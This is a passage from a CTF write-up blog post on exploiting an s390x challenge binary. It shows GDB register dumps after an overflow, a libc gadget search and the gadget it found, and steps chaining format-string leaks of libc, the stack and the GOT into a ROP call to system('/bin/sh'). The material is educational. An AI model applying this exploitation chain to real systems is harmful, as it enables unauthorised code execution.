</span></span><span class=line><span class=cl>   0x1000942:   nopr    %r7
</span></span><span class=line><span class=cl>   0x1000944:   nopr    %r7
</span></span><span class=line><span class=cl>gef&gt;  x/5gx $r11 + 1280
</span></span><span class=line><span class=cl>0x7f6d2f6479f0: 0x000000000000cafe      0x000000000000babe
</span></span><span class=line><span class=cl>0x7f6d2f647a00: 0x000000000000dead      0x000000000000beef
</span></span><span class=line><span class=cl>0x7f6d2f647a10: 0x0000000000001337
</span></span><span class=line><span class=cl>gef&gt;  x $r11
</span></span><span class=line><span class=cl>0x7f6d2f6474f0: 0x0000000000000000
</span></span><span class=line><span class=cl>gef&gt;  x $r12
</span></span><span class=line><span class=cl>0x4141414141414141:     Cannot access memory at address 0x4141414141414141
</span></span><span class=line><span class=cl>gef&gt;  x $r13
</span></span><span class=line><span class=cl>0x4141414141414141:     Cannot access memory at address 0x4141414141414141
</span></span><span class=line><span class=cl>gef&gt;  x $r14
</span></span><span class=line><span class=cl>0x100092e &lt;main+254&gt;:   0xa7180000b9140011
</span></span><span class=line><span class=cl>gef&gt;  x $r15
</span></span><span class=line><span class=cl>0x7f6d2f6474f0: 0x0000000000000000
</span></span><span class=line><span class=cl>gef&gt;  si
</span></span><span class=line><span class=cl>0x0000000001000940 in main ()
</span></span><span class=line><span class=cl>gef&gt;  x $r11
</span></span><span class=line><span class=cl>0xcafe: Cannot access memory at address 0xcafe
</span></span><span class=line><span class=cl>gef&gt;  x $r12
</span></span><span class=line><span class=cl>0xbabe: Cannot access memory at address 0xbabe
</span></span><span class=line><span class=cl>gef&gt;  x $r13
</span></span><span class=line><span class=cl>0xdead: Cannot access memory at address 0xdead
</span></span><span class=line><span class=cl>gef&gt;  x $r14
</span></span><span class=line><span class=cl>0xbeef: Cannot access memory at address 0xbeef
</span></span><span class=line><span class=cl>gef&gt;  x $r15
</span></span><span class=line><span class=cl>0x1337: Cannot access memory at address 0x1337
</span></span></code></pre></div><p>Hence if we can control the stack we can use this as a "ret" like in ROP. Now if we call system we only need to control arg1 which is r2. After the overflow, we have control of r11-15 so if we can get a move instruction to move something from those registers to r2 we can call the system.
Using objdump I dumped the entire libc and then grepped through it looking for instructions that moved r11 into r2. The best scenario is that after this it immediately calls our "ret".</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>grep -r l*l.*r2.*r11 libc.disasm -A 2 |  grep  &#34;br..r14&#34; -B 2
</span></span></code></pre></div><p>To my surprise, this actually existed in the binary and at this point, we were done.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>  160554:       b9 14 00 2b             lgfr    %r2,%r11           
</span></span><span class=line><span class=cl>  160558:       eb 6f f0 e8 00 04       lmg     %r6,%r15,232(%r15)
</span></span><span class=line><span class=cl>  16055e:       07 fe                   br      %r14
</span></span></code></pre></div><p>Small hicups along the way:</p><ul><li>lgr seems to move 32 bits only, hence the string of /bin/sh in libc won't work. I had to use my format string to write to the binary BSS as that address was 32 bits</li><li>r15 NEEDS to be a valid address that can be used as the stack. Using the BSS didn't work for me (it did for some others) so I ended up leaking libc's environ to find the stack. From there I calculated the offset to the current stack pointer, I always used this pointer as it worked nicely.</li></ul><p>FINAL EXPLOIT STEPS:</p><ul><li>Overflow stack so return address is main</li><li>Printf("%p") to get libc leaks</li><li>Leak libc.environ to get stack leak</li><li>Format String to move "/bin/sh" into .bss</li><li>ROP using a gadget to "pop r2" and system</li></ul><p>At this point, I had a super reliable exploit locally but on remote, it didn't work again. At this point, there were a couple of hours of the CTF left and I was freaking out. After opening a ticket I realized that my libc addresses were wrong. Nothing made sense until I got a IP to connect to and I checked the value at libc base. To my surprise, it was not "ELF" instead it was some massive chunk of bytes. At this point, I realized that using %p to leak stack values is not a good idea as the stack shifts a lot. Instead, I used the format string to leak the GOT. After this, my exploit worked!!</p><figure class=fig><div class=fig-frame><div class=fig-bar><span class=marker aria-hidden=true>&#9656;</span><span class=name>fig1.png</span><span class=hint>&lt;CR> zoom</span></div><img src=/img/posts/gibson-s390x-format-string-to-rop/fig1.png alt="s390x stack layout diagram" loading=lazy decoding=async width=1300 height=261 data-lightbox-src=/img/posts/gibson-s390x-format-string-to-rop/fig1.png tabindex=0 role=button aria-label="zoom image"></div><figcaption class=fig-cap><span class=quote aria-hidden=true>"</span> fig 1 — stack layout used for the ROP chain</figcaption></figure><p>Lessons Learned:</p><ul><li>Never assume addresses, if you have a leak always validate them</li><li>When learning a new architecture try to map instructions to ones that you are already familiar with</li><li>GDB's your best friend for learning new architectures</li></ul></div></main></div><div class=statusline style=--mode:#b58900><a class=mode href=/>NORMAL</a>
<a class=file href=/posts/>posts/2022/gibson-s390x-format-string-to-rop.md</a>
<span class="cell cell--auto" id=status-ln>ln 1/338</span><span class="cell cell--chrome" id=status-pct>0%</span></div></div><div class=palette-backdrop data-palette-backdrop></div><div class=palette id=cmd-palette role=dialog aria-modal=true aria-label="Command palette"><div class=palette-handle-row><span class=palette-handle></span></div><div class=palette-input-row><span class=colon aria-hidden=true>:</span>
<input class=palette-input id=palette-input type=text autocomplete=off autocapitalize=off spellcheck=false aria-label=Command></div><div class=palette-results role=listbox aria-label=Commands id=palette-results><a class=palette-row role=option data-cmd=:posts data-desc="all write-ups" href=/posts/ style=color:#b58900><span class=cmd style=width:76px;flex:none>:posts</span><span class=desc>all write-ups</span>
</a><a class=palette-row role=option data-cmd=:cheat data-desc="cheatsheet index" href=/cheatsheets/ style=color:#2aa198><span class=cmd style=width:76px;flex:none>:cheat</span><span class=desc>cheatsheet index</span>
</a><a class=palette-row role=option data-cmd=:about data-desc="who's typing" href=/about/ style=color:#d33682><span class=cmd style=width:76px;flex:none>:about</span><span class=desc>who's typing</span>
</a><a class=palette-row role=option data-cmd=:theme data-desc="light / dark" href=# data-action=theme style=color:#6c71c4><span class=cmd style=width:76px;flex:none>:theme</span><span class=desc>light / dark</span>
</a><a class=palette-row role=option data-cmd=:rss data-desc=subscribe href=/feed.xml style=color:#268bd2><span class=cmd style=width:76px;flex:none>:rss</span><span class=desc>subscribe</span></a></div></div><nav class=palette-fallback aria-label=Site><ul><li><a href=/posts/>:posts</a> — all write-ups</li><li><a href=/cheatsheets/>:cheat</a> — cheatsheet index</li><li><a href=/about/>:about</a> — who's typing</li><li><a href=#>:theme</a> — light / dark</li><li><a href=/feed.xml>:rss</a> — subscribe</li></ul></nav><div class=lightbox id=lightbox aria-hidden=true><div class=lightbox-body><img id=lightbox-img src alt><div class=lightbox-cap id=lightbox-cap></div></div><div class=statusline><span class=mode style=--mode:var(--mode-zoom)>ZOOM</span>
<span class=file>h/l next &#183; q close</span>
<span class="cell cell--auto cell--chrome" id=lightbox-count>1/1</span></div></div><script src=/js/bundle.e64d1a1fd7dd93ee47fdcbd5c0b75bb8422ad5f9ec5ad0ee69b531c9887d1a9f.js integrity="sha256-5k0aH9fdk+5H/cvVwLdbuEIq1fnsWtDuabUxyYh9Gp8=" defer></script></body></html>